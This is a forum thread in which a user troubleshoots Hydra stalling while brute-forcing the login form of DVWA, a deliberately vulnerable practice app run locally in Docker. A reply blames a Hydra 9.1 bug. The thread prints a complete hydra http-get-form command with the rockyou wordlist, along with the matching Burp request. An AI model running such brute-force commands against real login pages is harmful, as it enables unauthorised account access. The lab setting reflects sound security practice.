Hydra hangs after TASKS number of tries



  • I have DVWA set up and I am using the command:

    hydra -IV -t 1 -l admin -P rockyou.txt localhost http-get-form "/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: PHPSESSID=tegnf0po32eavd385ckd9khqc3; security=low"
    

    since my request in BurpSuite looks like this:

    GET /vulnerabilities/brute/index.php?username=test&password=123&Login=Login HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost/vulnerabilities/brute/index.php
    Cookie: PHPSESSID=tegnf0po32eavd385ckd9khqc3; security=low
    Upgrade-Insecure-Requests: 1
    

    Hydra only tries one password and then hangs, only giving status updates for the next minutes like so:

    [STATUS] 1.00 tries/min, 1 tries in 00:01h, 14344397 to do in 239073:18h, 1 active
    [STATUS] 0.33 tries/min, 1 tries in 00:03h, 14344397 to do in 717219:52h, 1 active
    

    My hydra version is v9.1

    I am running DVWA in a docker container and can access the target page via browser on the url: http://localhost/vulnerabilities/brute/index.php



  • According to this issue: https://github.com/vanhauser-thc/thc-hydra/issues/612 Hydra 9.1 has a bug that affects that command... even though version 9.2 only mentions an http-post-request bugfix.

    Kali does not install version 9.2 and says 9.1 is the latest when doing sudo apt install hydra.


